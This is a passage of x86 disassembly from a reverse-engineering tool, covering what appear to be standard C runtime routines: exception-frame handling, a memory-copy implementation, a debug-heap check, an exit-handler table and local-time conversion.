var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_14], 0
mov [ebp+var_10], offset sub_420500
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
mov ecx, [ebp+arg_0]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_C]
add edx, 1
mov [ebp+var_4], edx
mov eax, large fs:0
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
mov large fs:0, eax
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+arg_8]
push edx
call sub_42D810
mov [ebp+var_18], eax
mov eax, [ebp+var_14]
mov large fs:0, eax
mov eax, [ebp+var_18]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_420490 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420500 proc near ; DATA XREF: sub_420490+10�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
cld
push 0
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_4]
mov edx, [ecx+10h]
push edx
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
push ecx
push 0
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
mov ecx, [eax+0Ch]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_42CBB0
add esp, 20h
pop edi
pop esi
pop ebx
pop ebp
retn
sub_420500 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420540 proc near ; CODE XREF: sub_42CF40+2D�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
mov [ebp+var_28], 0
mov [ebp+var_24], offset sub_420610
mov eax, [ebp+arg_10]
mov [ebp+var_20], eax
mov ecx, [ebp+arg_4]
mov [ebp+var_1C], ecx
mov edx, [ebp+arg_14]
mov [ebp+var_18], edx
mov eax, [ebp+arg_18]
mov [ebp+var_14], eax
mov [ebp+var_10], 0
mov [ebp+var_C], 0
mov [ebp+var_8], 0
mov [ebp+var_4], 0
mov [ebp+var_10], offset loc_4205DC
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_34], 1
mov ecx, [ebp+arg_0]
mov [ebp+var_30], ecx
mov edx, [ebp+arg_8]
mov [ebp+var_2C], edx
lea eax, [ebp+var_30]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx]
push edx
call sub_428EE0
call dword ptr [eax+68h]
add esp, 8
mov [ebp+var_34], 0
loc_4205DC: ; DATA XREF: sub_420540+4B�o
cmp [ebp+var_4], 0
jz short loc_4205F9
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_420602
; ---------------------------------------------------------------------------
loc_4205F9: ; CODE XREF: sub_420540+A0�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_420602: ; CODE XREF: sub_420540+B7�j
mov eax, [ebp+var_34]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_420540 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420610 proc near ; DATA XREF: sub_420540+10�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
cld
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
and ecx, 66h
test ecx, ecx
jz short loc_420635
mov edx, [ebp+arg_4]
mov dword ptr [edx+24h], 1
mov eax, 1
jmp short loc_42068C
; ---------------------------------------------------------------------------
loc_420635: ; CODE XREF: sub_420610+12�j
push 1
mov eax, [ebp+arg_4]
mov ecx, [eax+14h]
push ecx
mov edx, [ebp+arg_4]
mov eax, [edx+10h]
push eax
mov ecx, [ebp+arg_4]
mov edx, [ecx+8]
push edx
push 0
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
mov edx, [ecx+0Ch]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_42CBB0
add esp, 20h
mov ecx, [ebp+arg_4]
cmp dword ptr [ecx+24h], 0
jnz short loc_42067B
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+arg_4]
push eax
call sub_4203C0
loc_42067B: ; CODE XREF: sub_420610+5C�j
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp dword ptr [ebx+18h]
; ---------------------------------------------------------------------------
mov eax, 1
loc_42068C: ; CODE XREF: sub_420610+23�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_420610 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4206A0 proc near ; CODE XREF: sub_42CCA0+135�p
; sub_42CF40+52�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, [eax+10h]
mov esi, [eax+0Ch]
mov [ebp+var_4], ecx
mov ecx, [ebp+arg_4]
test ecx, ecx
mov edi, esi
mov ebx, esi
jl short loc_4206F9
loc_4206BE: ; CODE XREF: sub_4206A0+54�j
cmp esi, 0FFFFFFFFh
jnz short loc_4206C8
call sub_42D910
loc_4206C8: ; CODE XREF: sub_4206A0+21�j
mov eax, [ebp+var_4]
dec esi
mov ecx, [ebp+arg_8]
lea edx, [esi+esi*4]
lea eax, [eax+edx*4]
cmp ecx, [eax+4]
jle short loc_4206DF
cmp ecx, [eax+8]
jle short loc_4206E4
loc_4206DF: ; CODE XREF: sub_4206A0+38�j
cmp esi, 0FFFFFFFFh
jnz short loc_4206EF
loc_4206E4: ; CODE XREF: sub_4206A0+3D�j
mov eax, [ebp+arg_4]
mov edi, ebx
dec eax
mov ebx, esi
mov [ebp+arg_4], eax
loc_4206EF: ; CODE XREF: sub_4206A0+42�j
mov eax, [ebp+arg_4]
test eax, eax
jge short loc_4206BE
mov eax, [ebp+arg_0]
loc_4206F9: ; CODE XREF: sub_4206A0+1C�j
mov ecx, [ebp+arg_C]
mov edx, [ebp+arg_10]
inc esi
mov [ecx], esi
mov [edx], edi
cmp edi, [eax+0Ch]
ja short loc_42070D
cmp esi, edi
jbe short loc_420712
loc_42070D: ; CODE XREF: sub_4206A0+67�j
call sub_42D910
loc_420712: ; CODE XREF: sub_4206A0+6B�j
mov ecx, [ebp+var_4]
lea eax, [esi+esi*4]
pop edi
pop esi
lea eax, [ecx+eax*4]
pop ebx
mov esp, ebp
pop ebp
retn
sub_4206A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420730 proc near ; CODE XREF: sub_423364+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_420748
push [ebp+arg_0]
call sub_43ABA6 ; RtlUnwind
loc_420748: ; DATA XREF: sub_420730+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_420730 endp
; =============== S U B R O U T I N E =======================================
sub_420750 proc near ; DATA XREF: sub_420772+A�o
; sub_4207DA+9�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_420771
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_420771: ; CODE XREF: sub_420750+10�j
retn
sub_420750 endp
; =============== S U B R O U T I N E =======================================
sub_420772 proc near ; CODE XREF: sub_423364+67�p
; sub_423364+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_420750
push large dword ptr fs:0
mov large fs:0, esp
loc_42078F: ; CODE XREF: sub_420772:loc_4207CA�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_4207CC
cmp esi, [esp+1Ch+arg_4]
jz short loc_4207CC
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_4207CA
push 101h
mov eax, [ebx+esi*4+8]
call sub_420806
call dword ptr [ebx+esi*4+8]
loc_4207CA: ; CODE XREF: sub_420772+44�j
jmp short loc_42078F
; ---------------------------------------------------------------------------
loc_4207CC: ; CODE XREF: sub_420772+2A�j
; sub_420772+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_420772 endp
; =============== S U B R O U T I N E =======================================
sub_4207DA proc near ; CODE XREF: sub_42D3ED+4B�p
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_420750
jnz short locret_4207FC
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_4207FC
mov eax, 1
locret_4207FC: ; CODE XREF: sub_4207DA+10�j
; sub_4207DA+1B�j
retn
sub_4207DA endp
; =============== S U B R O U T I N E =======================================
sub_4207FD proc near ; CODE XREF: sub_42D810+1E�p
; sub_42D810+40�p
push ebx
push ecx
mov ebx, offset dword_45182C
jmp short loc_420810
sub_4207FD endp
; =============== S U B R O U T I N E =======================================
sub_420806 proc near ; CODE XREF: sub_420772+4F�p
; sub_423364+78�p
push ebx
push ecx
mov ebx, offset dword_45182C
mov ecx, [ebp+8]
loc_420810: ; CODE XREF: sub_4207FD+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_420806 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_420820 proc near ; CODE XREF: sub_40D7E4+5�p
; sub_40D95B+5�p ...
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_420820 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420840 proc near ; CODE XREF: sub_40E03B�j
; sub_4241B0+590�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_420860
cmp edi, eax
jb loc_4209D8
loc_420860: ; CODE XREF: sub_420840+16�j
test edi, 3
jnz short loc_42087C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_42089C
rep movsd
jmp off_420988[edx*4]
; ---------------------------------------------------------------------------
loc_42087C: ; CODE XREF: sub_420840+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_420894
and eax, 3
add ecx, eax
jmp dword ptr loc_42089C+4[eax*4]
; ---------------------------------------------------------------------------
loc_420894: ; CODE XREF: sub_420840+46�j
jmp dword ptr loc_420998[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_42089C: ; CODE XREF: sub_420840+31�j
; sub_420840+8E�j ...
jmp off_42091C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4208B0
dd offset loc_4208DC
dd offset loc_420900
; ---------------------------------------------------------------------------
loc_4208B0: ; DATA XREF: sub_420840+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_42089C
rep movsd
jmp off_420988[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_4208DC: ; DATA XREF: sub_420840+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_42089C
rep movsd
jmp off_420988[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_420900: ; DATA XREF: sub_420840+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_42089C
rep movsd
jmp off_420988[edx*4]
; ---------------------------------------------------------------------------
align 4
off_42091C dd offset loc_42097F ; DATA XREF: sub_420840:loc_42089C�r
dd offset loc_42096C
dd offset loc_420964
dd offset loc_42095C
dd offset loc_420954
dd offset loc_42094C
dd offset loc_420944
dd offset loc_42093C
; ---------------------------------------------------------------------------
loc_42093C: ; CODE XREF: sub_420840:loc_42089C�j
; DATA XREF: sub_420840+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_420944: ; CODE XREF: sub_420840:loc_42089C�j
; DATA XREF: sub_420840+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_42094C: ; CODE XREF: sub_420840:loc_42089C�j
; DATA XREF: sub_420840+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_420954: ; CODE XREF: sub_420840:loc_42089C�j
; DATA XREF: sub_420840+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_42095C: ; CODE XREF: sub_420840:loc_42089C�j
; DATA XREF: sub_420840+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_420964: ; CODE XREF: sub_420840:loc_42089C�j
; DATA XREF: sub_420840+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_42096C: ; CODE XREF: sub_420840:loc_42089C�j
; DATA XREF: sub_420840+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_42097F: ; CODE XREF: sub_420840:loc_42089C�j
; DATA XREF: sub_420840:off_42091C�o
jmp off_420988[edx*4]
; ---------------------------------------------------------------------------
align 4
off_420988 dd offset loc_420998 ; DATA XREF: sub_420840+35�r
; sub_420840+92�r ...
dd offset loc_4209A0
dd offset loc_4209AC
dd offset loc_4209C0
; ---------------------------------------------------------------------------
loc_420998: ; CODE XREF: sub_420840+35�j
; sub_420840+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4209A0: ; CODE XREF: sub_420840+35�j
; sub_420840+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4209AC: ; CODE XREF: sub_420840+35�j
; sub_420840+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4209C0: ; CODE XREF: sub_420840+35�j
; sub_420840+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4209D8: ; CODE XREF: sub_420840+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_420A0C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_420A00
std
rep movsd
cld
jmp off_420B20[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_420A00: ; CODE XREF: sub_420840+1B1�j
; sub_420840+208�j ...
neg ecx
jmp dword ptr loc_420ACF+1[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_420A0C: ; CODE XREF: sub_420840+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_420A24
and eax, 3
sub ecx, eax
jmp dword ptr loc_420A24+4[eax*4]
; ---------------------------------------------------------------------------
loc_420A24: ; CODE XREF: sub_420840+1D6�j
; DATA XREF: sub_420840+1DD�r
jmp off_420B20[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_420A37+1
; ---------------------------------------------------------------------------
pop eax
or al, [edx+0]
or byte ptr [edx], 42h
loc_420A37: ; DATA XREF: sub_420840+1EC�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_420A00
std
rep movsd
cld
jmp off_420B20[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_420A00
std
rep movsd
cld
jmp off_420B20[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_420A00
std
rep movsd
cld
jmp off_420B20[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_420AD4
dd offset loc_420ADC
dd offset loc_420AE4
dd offset loc_420AEC
dd offset loc_420AF4
; ---------------------------------------------------------------------------
cld
or al, [edx+0]
add al, 0Bh
inc edx
loc_420ACF: ; DATA XREF: sub_420840+1C2�r
add [edi], dl
or eax, [edx+0]
loc_420AD4: ; DATA XREF: sub_420840+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_420ADC: ; DATA XREF: sub_420840+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_420AE4: ; DATA XREF: sub_420840+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_420AEC: ; DATA XREF: sub_420840+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_420AF4: ; DATA XREF: sub_420840+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_420B17: ; CODE XREF: sub_420840+1C2�j
jmp off_420B20[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_420B20 dd offset loc_420B30 ; DATA XREF: sub_420840+1B7�r
; sub_420840:loc_420A24�r ...
dd offset loc_420B38
dd offset loc_420B48
dd offset loc_420B5C
; ---------------------------------------------------------------------------
loc_420B30: ; CODE XREF: sub_420840+1B7�j
; sub_420840:loc_420A24�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_420B38: ; CODE XREF: sub_420840+1B7�j
; sub_420840:loc_420A24�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_420B48: ; CODE XREF: sub_420840+1B7�j
; sub_420840:loc_420A24�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_420B5C: ; CODE XREF: sub_420840+1B7�j
; sub_420840:loc_420A24�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_420840 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420B80 proc near ; CODE XREF: sub_40E123+4�p
; sub_43A5E0+1D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
cmp [ebp+arg_0], 0
jnz short loc_420B92
jmp loc_420C1A
; ---------------------------------------------------------------------------
loc_420B92: ; CODE XREF: sub_420B80+B�j
push 9
call sub_423280
add esp, 4
mov eax, [ebp+arg_0]
sub eax, 20h
mov [ebp+var_4], eax
loc_420BA5: ; CODE XREF: sub_420B80+7B�j
mov ecx, [ebp+var_4]
mov edx, [ecx+14h]
and edx, 0FFFFh
cmp edx, 4
jz short loc_420BF7
mov eax, [ebp+var_4]
cmp dword ptr [eax+14h], 1
jz short loc_420BF7
mov ecx, [ebp+var_4]
mov edx, [ecx+14h]
and edx, 0FFFFh
cmp edx, 2
jz short loc_420BF7
mov eax, [ebp+var_4]
cmp dword ptr [eax+14h], 3
jz short loc_420BF7
push offset a_block_type_is ; "_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)"
push 0
push 2Fh
push offset dword_43CDA0
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_420BF7
int 3 ; Trap to Debugger
loc_420BF7: ; CODE XREF: sub_420B80+34�j
; sub_420B80+3D�j ...
xor ecx, ecx
test ecx, ecx
jnz short loc_420BA5
mov edx, [ebp+var_4]
mov eax, [edx+14h]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_41CA10
add esp, 8
push 9
call sub_423320
add esp, 4
loc_420C1A: ; CODE XREF: sub_420B80+D�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_420B80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420C30 proc near ; CODE XREF: sub_40E176+B�p
; _0:0040ED2F�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1
mov eax, [ebp+arg_0]
push eax
call sub_41BEA0
add esp, 8
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_420C30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420C50 proc near ; CODE XREF: sub_420D10+7�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
call sub_41EA10
push 2
mov eax, ds:dword_4F4A34
push eax
call sub_41CE90
add esp, 8
mov ecx, ds:dword_4F4A30
sub ecx, ds:dword_4F4A34
add ecx, 4
cmp eax, ecx
jnb short loc_420CDD
push 68h
push offset dword_43CDAC
push 2
push 2
mov edx, ds:dword_4F4A34
push edx
call sub_41CE90
add esp, 8
add eax, 10h
push eax
mov eax, ds:dword_4F4A34
push eax
call sub_41C360
add esp, 14h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_420CBA
call sub_41EA20
xor eax, eax
jmp short loc_420CFF
; ---------------------------------------------------------------------------
loc_420CBA: ; CODE XREF: sub_420C50+5F�j
mov ecx, ds:dword_4F4A30
sub ecx, ds:dword_4F4A34
sar ecx, 2
mov edx, [ebp+var_4]
lea eax, [edx+ecx*4]
mov ds:dword_4F4A30, eax
mov ecx, [ebp+var_4]
mov ds:dword_4F4A34, ecx
loc_420CDD: ; CODE XREF: sub_420C50+2A�j
mov edx, ds:dword_4F4A30
mov eax, [ebp+arg_0]
mov [edx], eax
mov ecx, ds:dword_4F4A30
add ecx, 4
mov ds:dword_4F4A30, ecx
call sub_41EA20
mov eax, [ebp+arg_0]
loc_420CFF: ; CODE XREF: sub_420C50+68�j
mov esp, ebp
pop ebp
retn
sub_420C50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420D10 proc near ; CODE XREF: _0:0040DBD5�p
; sub_43A8C0+8�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push eax
call sub_420C50
add esp, 4
neg eax
sbb eax, eax
neg eax
dec eax
pop ebp
retn
sub_420D10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420D30 proc near ; DATA XREF: _2:0043F020�o
push ebp
mov ebp, esp
push 0B6h
push offset dword_43CDAC
push 2
push 80h
call sub_41BE70
add esp, 10h
mov ds:dword_4F4A34, eax
cmp ds:dword_4F4A34, 0
jnz short loc_420D64
push 18h
call sub_422270
add esp, 4
loc_420D64: ; CODE XREF: sub_420D30+28�j
mov eax, ds:dword_4F4A34
mov dword ptr [eax], 0
mov ecx, ds:dword_4F4A34
mov ds:dword_4F4A30, ecx
pop ebp
retn
sub_420D30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420D80 proc near ; CODE XREF: sub_40E29B+1A2�p
var_D8 = dword ptr -0D8h
var_D4 = dword ptr -0D4h
var_D0 = byte ptr -0D0h
var_36 = dword ptr -36h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_A = dword ptr -0Ah
var_6 = dword ptr -6
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0D8h
lea eax, [ebp+var_24]
push eax
call ds:dword_4F5404 ; GetLocalTime
lea ecx, [ebp+var_10]
push ecx
call ds:dword_4F5480 ; GetSystemTime
mov edx, [ebp+var_6]
and edx, 0FFFFh
xor eax, eax
mov ax, word ptr ds:dword_4F3358+2
cmp edx, eax
jnz short loc_420E18
mov ecx, [ebp-8]
and ecx, 0FFFFh
xor edx, edx
mov dx, word ptr ds:dword_4F3358
cmp ecx, edx
jnz short loc_420E18
mov eax, [ebp+var_A]
and eax, 0FFFFh
xor ecx, ecx
mov cx, ds:word_4F3356
cmp eax, ecx
jnz short loc_420E18
mov edx, [ebp+var_10+2]
and edx, 0FFFFh
xor eax, eax
mov ax, word ptr ds:dword_4F3350+2
cmp edx, eax
jnz short loc_420E18
mov ecx, [ebp+var_10]
and ecx, 0FFFFh
xor edx, edx
mov dx, word ptr ds:dword_4F3350
cmp ecx, edx
jnz short loc_420E18
mov eax, ds:dword_4F3348
mov [ebp+var_D8], eax
jmp loc_420EA0
; ---------------------------------------------------------------------------
loc_420E18: ; CODE XREF: sub_420D80+30�j
; sub_420D80+46�j ...
lea ecx, [ebp+var_D0]
push ecx
call ds:dword_4F547C ; GetTimeZoneInformation
mov [ebp+var_D4], eax
cmp [ebp+var_D4], 0FFFFFFFFh
jz short loc_420E68
cmp [ebp+var_D4], 2
jnz short loc_420E5C
mov edx, [ebp+var_36]
and edx, 0FFFFh
test edx, edx
jz short loc_420E5C
cmp [ebp+var_28], 0
jz short loc_420E5C
mov [ebp+var_D8], 1
jmp short loc_420E66
; ---------------------------------------------------------------------------
loc_420E5C: ; CODE XREF: sub_420D80+BB�j
; sub_420D80+C8�j ...
mov [ebp+var_D8], 0
loc_420E66: ; CODE XREF: sub_420D80+DA�j
jmp short loc_420E72
; ---------------------------------------------------------------------------
loc_420E68: ; CODE XREF: sub_420D80+B2�j
mov [ebp+var_D8], 0FFFFFFFFh
loc_420E72: ; CODE XREF: sub_420D80:loc_420E66�j
mov eax, [ebp+var_D8]
mov ds:dword_4F3348, eax
mov ecx, [ebp+var_10]
mov ds:dword_4F3350, ecx
mov edx, [ebp-0Ch]
mov dword ptr ds:byte_4F3354, edx
mov eax, [ebp+var_A+2]
mov ds:dword_4F3358, eax
mov ecx, [ebp+var_6+2]
mov ds:dword_4F335C, ecx
loc_420EA0: ; CODE XREF: sub_420D80+93�j
mov edx, [ebp+var_D8]
push edx
mov eax, [ebp+var_18]
and eax, 0FFFFh
push eax
mov ecx, [ebp-1Ah]
and ecx, 0FFFFh
push ecx
mov edx, [ebp+var_1C]
and edx, 0FFFFh
push edx
mov eax, [ebp-1Eh]
and eax, 0FFFFh
push eax
mov ecx, [ebp+var_24+2]
and ecx, 0FFFFh
push ecx
mov edx, [ebp+var_24]
and edx, 0FFFFh
push edx
call sub_42D9A0
add esp, 1Ch
mov [ebp+var_14], eax
cmp [ebp+arg_0], 0
jz short loc_420EFA
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
mov [eax], ecx
loc_420EFA: ; CODE XREF: sub_420D80+170�j
mov eax, [ebp+var_14]
mov esp, ebp
pop ebp
retn
sub_420D80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420F10 proc near ; CODE XREF: sub_40E29B+18�p
; sub_4350B0+40�p ...
var_10 = dword ptr -10h
arg_0 = dword ptr 8
